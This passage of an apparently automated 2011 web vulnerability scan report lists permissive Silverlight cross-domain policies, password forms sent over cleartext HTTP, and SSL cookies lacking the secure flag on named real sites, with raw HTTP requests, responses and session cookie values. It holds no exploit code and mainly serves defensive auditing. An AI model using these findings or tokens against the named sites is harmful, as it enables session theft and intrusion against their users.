The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Thu, 12 May 2011 11:01:15 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://ad.us.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.us.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.us.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Thu, 12 May 2011 11:03:16 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.3. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 11:04:16 GMT
Date: Thu, 12 May 2011 11:04:16 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

6.4. http://secure-us.imrworldwide.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:04:08 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Thu, 19 May 2011 11:04:08 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7. Cleartext submission of password previous next
There are 9 instances of this issue:

http://secniche.org:2082/tmp/secniche/webalizer//usage_201105.html
http://www.digiware.net/
http://www.huroncapital.com/secure/
http://www.pillsburylaw.com/
http://www.pillsburylaw.com/index.cfm
http://www.privateequityinfo.com/
http://www.privateequityinfo.com/forgotpassword.php
http://www.privateequityinfo.com/product_details.php
http://www.soundpatheview.com/

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

7.1. http://secniche.org:2082/tmp/secniche/webalizer//usage_201105.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secniche.org:2082
Path:	/tmp/secniche/webalizer//usage_201105.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secniche.org:2082/login/

The form contains the following password field:

pass

Request

GET /tmp/secniche/webalizer//usage_201105.html HTTP/1.1
Host: secniche.org:2082
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 401 Access Denied
WWW-Authenticate: Basic realm="cPanel"
Connection: close
Set-Cookie: logintheme=cpanel; path=/; HttpOnly; port=2082
Set-Cookie: cprelogin=no; path=/; HttpOnly; port=2082
Set-Cookie: cpsession=c8nOrrFvbqOSWIwMKTiLmobUg7nWh12n8Lm0BmUzByVMqdJtCxzFc9g5YnYZNbpn; path=/; HttpOnly; port=2082
Server: cpsrvd/11.28.87
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon" h
...[SNIP]...
<div id="content-wrap" align="center">

<form action="/login/" method="post" >
<input type="hidden" name="login_theme" value="cpanel" />
...[SNIP]...
<td class="login_lines"><input id="pass" type="password" name="pass" size="16" tabindex="2" /></td>
...[SNIP]...

7.2. http://www.digiware.net/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.digiware.net
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.digiware.net/index.php

The form contains the following password field:

passwd

Request

GET / HTTP/1.1
Host: www.digiware.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:06:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: f165d946d0a4013e03ebd5d7edb21d2c=bqhecm8n2rb4cadkusa5gg38q1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 12 May 2011 13:06:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19619

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<td><form action="/index.php" method="post" name="login" class="form-login">
<div align="center">
...[SNIP]...
<p align="center">Clave 
<input name="passwd" type="password" class="textfields" id="mod_login_password" alt="Contrase..a" /></p>
...[SNIP]...

7.3. http://www.huroncapital.com/secure/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huroncapital.com
Path:	/secure/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.huroncapital.com/secure/index.html

The form contains the following password field:

password

Request

GET /secure/ HTTP/1.1
Host: www.huroncapital.com
Proxy-Connection: keep-alive
Referer: http://www.huroncapital.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:13:52 GMT
Server: Apache/1.3.37 (Unix)
AuthUser: -
Set-Cookie: SESSIONID=9d65c422a80d78d0b2c9cee35d9a8062; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8870

<html>

   <head>
       <meta http-equiv="Content-Language" content="en-us">
       <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
       <meta name="generator" content="Adobe GoLive
...[SNIP]...
</P>

<form method="post" action="index.html" name="loginform">
<div align="center">
...[SNIP]...
<td><input name="password" type="password" size="20" maxlength="50"></td>
...[SNIP]...

7.4. http://www.pillsburylaw.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pillsburylaw.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.pillsburylaw.com/index.cfm?pageID=60

The form contains the following password field:

pcpassword

Request

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812913;path=/
Set-Cookie: CFTOKEN=26160612;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 12:22:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
</div>
                   <FORM action="/index.cfm?pageID=60" id="pcLogin" name="pcLogin" method="post" class="form">
                   <label>
...[SNIP]...
<input id="password-clear" type="text" value="Password" style="display:none;width:94%;"/>
                       <input type="password" name="pcpassword" id="pcpassword" value="" class="required" alias="Password" style="width:94%;">
                   </label>
...[SNIP]...

7.5. http://www.pillsburylaw.com/index.cfm previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pillsburylaw.com
Path:	/index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.pillsburylaw.com/index.cfm?pageID=60

The form contains the following password field:

pcpassword

Request

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.2.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:31:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<div class="box" id="loginbox">

   <FORM action="/index.cfm?pageID=60" id="pcLogin" name="pcLogin" method="post" class="form">
   <h2>
...[SNIP]...
<input id="password-clear" type="text" value="Password" style="display:none;width:94%;"/>
       <input type="password" name="pcpassword" id="pcpassword" value="" class="required" alias="Password" style="width:94%;">
   </label>
...[SNIP]...

7.6. http://www.privateequityinfo.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.privateequityinfo.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.privateequityinfo.com/login.php

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Set-Cookie: PHPSESSID=eq1oat81k7im20tchffed7ii03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25258

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Private Equity Firms, Hedge Funds, Mezzanine Investors, Small Business Investment Companies (SBIC), Valuation Fi
...[SNIP]...
a regularly updated database of hundreds of firms and thousands of contacts, Private Equity Info is a valuable resource for information on financial buyers, mezzanine investors and hedge funds.">
<form action="login.php" method="post" name="f" onSubmit="return encrypt(this);">
<tr>
...[SNIP]...
<td align="right"><input type="password" name="password" size="20" class="formFieldN" tabindex="2" id="passa" onfocus="changecss('passa', 'Password', 'nformFieldN','password', this);" onblur="backcss('passa', 'Password', 'formFieldN','text', this);" value="Password"/></td>
...[SNIP]...

7.7. http://www.privateequityinfo.com/forgotpassword.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.privateequityinfo.com
Path:	/forgotpassword.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.privateequityinfo.com/login.php

The form contains the following password field:

password

Request

GET /forgotpassword.php HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
Referer: http://www.privateequityinfo.com/product_details.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bvv46lr2q5ms0uqefrt9jbsal0; __utma=222922074.264370130.1305198145.1305198145.1305198145.1; __utmc=222922074; __utmz=222922074.1305198145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=222922074

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:14:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Content-Type: text/html
Content-Length: 21431

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Private Equity Info - Forgot Your Password?</title>
<meta name="description" content="Database of private equit
...[SNIP]...
a regularly updated database of hundreds of firms and thousands of contacts, Private Equity Info is a valuable resource for information on financial buyers, mezzanine investors and hedge funds.">
<form action="login.php" method="post" name="f" onSubmit="return encrypt(this);">
<tr>
...[SNIP]...
<td align="right"><input type="password" name="password" size="20" class="formFieldN" tabindex="2" id="passa" onfocus="changecss('passa', 'Password', 'nformFieldN','password', this);" onblur="backcss('passa', 'Password', 'formFieldN','text', this);" value="Password"/></td>
...[SNIP]...

7.8. http://www.privateequityinfo.com/product_details.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.privateequityinfo.com
Path:	/product_details.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.privateequityinfo.com/login.php

The form contains the following password field:

password

Request

GET /product_details.php HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
Referer: http://www.privateequityinfo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bvv46lr2q5ms0uqefrt9jbsal0; __utma=222922074.264370130.1305198145.1305198145.1305198145.1; __utmb=222922074; __utmc=222922074; __utmz=222922074.1305198145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:14:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 58851

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Product details</title>
<meta name="description" content="Database of Private Equity Firms, Hedge Funds, Mezzan
...[SNIP]...
a regularly updated database of hundreds of firms and thousands of contacts, Private Equity Info is a valuable resource for information on financial buyers, mezzanine investors and hedge funds.">
<form action="login.php" method="post" name="f" onSubmit="return encrypt(this);">
<tr>
...[SNIP]...
<td align="right"><input type="password" name="password" size="20" class="formFieldN" tabindex="2" id="passa" onfocus="changecss('passa', 'Password', 'nformFieldN','password', this);" onblur="backcss('passa', 'Password', 'formFieldN','text', this);" value="Password"/></td>
...[SNIP]...

7.9. http://www.soundpatheview.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundpatheview.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.soundpatheview.com/

The form contains the following password field:

Password

Request

GET / HTTP/1.1
Host: www.soundpatheview.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tuckerellis.com/info/client-access

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:02 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title
...[SNIP]...
<div id="form_mods">
               <form id="hostform" action="">
                   <div class="form_cont">
...[SNIP]...
</div>
        <input type="password" id="host_pin" name="Password" title="Pin" maxlength="17" value="" />
        <div>
...[SNIP]...

8. SSL cookie without secure flag set previous next
There are 20 instances of this issue:

https://ams-legal.net/support/default.asp
https://ams-legal.net/tuckerellis/Image.asp
https://ams-legal.net/tuckerellis/Login.asp
https://ams-legal.net/tuckerellis/default.asp
https://ams-legal.net/tuckerellis/default.asp
https://cle-files.tuckerellis.com/
https://cle-files.tuckerellis.com/password_reset
https://cle-files.tuckerellis.com/register
https://secure.reportingsystem.com/TPG/index.cfm
https://services.sungarddx.com/Default.aspx
https://services.sungarddx.com/common/js/AdminFunctions.asp
https://services.sungarddx.com/js/source.asp
https://webmail.tuckerellis.com/exchweb/bin/auth/owaauth.dll
https://ww3.janus.com/advisor/about-janus
https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds
https://personal.vanguard.com/us/funds/snapshot
https://services.sungarddx.com/default.aspx
https://virtualoffice.tuckerellis.com/
https://ww3.janus.com/favicon.ico
https://www.wellsfargo.com/jump/theprivatebank/index

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

8.1. https://ams-legal.net/support/default.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://ams-legal.net
Path:	/support/default.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASPSESSIONIDQSCDBTRB=GJGHIDNBJPFJKBPOAGHLPKEK; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/default.asp HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ams-legal.com/services_and_support.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 403
Content-Type: text/html
Expires: Thu, 12 May 2011 12:32:27 GMT
Set-Cookie: ASPSESSIONIDQSCDBTRB=GJGHIDNBJPFJKBPOAGHLPKEK; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>AMS Legal Collaborator</title>
</head>
<frameset rows="100%,0" border="0">
<frame name="MainPnl" src="Logi
...[SNIP]...

8.2. https://ams-legal.net/tuckerellis/Image.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://ams-legal.net
Path:	/tuckerellis/Image.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASPSESSIONIDACBSASQD=NACKKCLBMLGHAKOHOFLAAKAL; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tuckerellis/Image.asp?Name=login-bar.png HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/Login.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQCDBTRB=PDGHIDNBEPFJCBKCFFIABLCC

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACBSASQD=NACKKCLBMLGHAKOHOFLAAKAL; path=/
Cache-control: private
Content-Length: 0

8.3. https://ams-legal.net/tuckerellis/Login.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://ams-legal.net
Path:	/tuckerellis/Login.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASPSESSIONIDACBSASQD=DACKKCLBEDJNFIFEHJMOIFOI; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tuckerellis/Login.asp HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQCDBTRB=PDGHIDNBEPFJCBKCFFIABLCC

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 2815
Content-Type: text/html
Expires: Thu, 12 May 2011 12:25:32 GMT
Set-Cookie: ASPSESSIONIDACBSASQD=DACKKCLBEDJNFIFEHJMOIFOI; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>AMS Legal Collaborator</title>
<link rel="stylesheet" type="text/css" href="Lo
...[SNIP]...

8.4. https://ams-legal.net/tuckerellis/default.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://ams-legal.net
Path:	/tuckerellis/default.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASPSESSIONIDSQCDBTRB=AEGHIDNBPNJAPLEFPMPOEJNA; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tuckerellis/default.asp HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 403
Content-Type: text/html
Expires: Thu, 12 May 2011 12:25:30 GMT
Set-Cookie: ASPSESSIONIDSQCDBTRB=AEGHIDNBPNJAPLEFPMPOEJNA; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
